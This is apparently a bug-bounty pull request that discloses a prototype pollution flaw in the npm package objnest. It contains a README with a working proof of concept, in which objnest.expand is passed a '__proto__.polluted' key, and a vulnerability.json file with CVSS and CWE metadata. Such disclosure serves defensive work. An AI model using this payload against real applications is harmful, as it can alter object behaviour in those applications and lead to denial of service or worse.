### PR TITLE
Prototype Pollution in objnest

### DIFF
--- a/bounties/npm/objnest/1/README.md
+++ b/bounties/npm/objnest/1/README.md
@@ -1,0 +1,30 @@
+# Description
+
+`objnest` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var objnest = require("objnest")
+console.log("Before : " + {}.polluted);
+objnest.expand({"__proto__.polluted": "Yes! Its Polluted"})
+console.log("After : " + {}.polluted);
+```
+
+2. Execute the following commands in another terminal:
+
+```bash
+npm i objnest # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```

--- a/bounties/npm/objnest/1/vulnerability.json
+++ b/bounties/npm/objnest/1/vulnerability.json
@@ -1,0 +1,55 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-10-30",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "objnest",
+        "URL": "https://www.npmjs.com/package/objnest",
+        "Downloads": "5,366"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/okunishinishi/node-objnest",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "okunishinishi",
+        "Name": "okunishinishi",
+        "Forks": 0,
+        "Stars": 6
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": []
+}


### PR DESCRIPTION
`objnest` is vulnerable to `Prototype Pollution`.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.